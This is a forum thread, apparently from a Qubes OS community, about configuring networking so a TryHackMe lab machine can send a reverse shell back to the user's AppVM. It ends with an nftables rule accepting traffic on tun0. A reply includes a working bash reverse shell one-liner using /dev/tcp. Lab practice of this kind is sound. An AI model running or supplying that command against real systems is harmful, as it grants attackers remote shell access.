Unable to Receive Reverse Shell on AppVM in Qubes from TryHackMe Lab

I’m using Qubes OS and successfully connected to the TryHackMe VPN using an OVPN file. I can access the lab environment (e.g., 10.10.10.10) without any issues. However, I’m unable to ping or receive a reverse shell from the TryHackMe lab to my AppVM.

I need to figure out how to configure the network settings on Qubes to allow incoming connections, specifically for reverse shell communication. Any advice on configuring this in a secure way would be appreciated!

Hi, could you provide more details is the ovpn file running on your TryHackme AppVM or sys-net or sys-firewall. If it’s on TryHackme qube then your reverse-shell payload might be an issue confirm if it works locally e.g /bin/bash -c "bash -i >& /dev/tcp/10.10.10.10/1337 0>&1"

Moreover will recommend you read this VPN Instruction for 4.2

1 Like

My OVPN runs on AppVM, which is connected to sys-firewall. I cannot ping from the TryHackMe machine to my machine, but I can ping from my machine to the TryHackMe machine. So, I can connect to 10.10.10.10, but TryHackMe still doesn’t recognize me as being connected

Okay, I have temporarily resolved the issue by adding the following rule:
sudo nft add rule ip qubes input iif "tun0" accept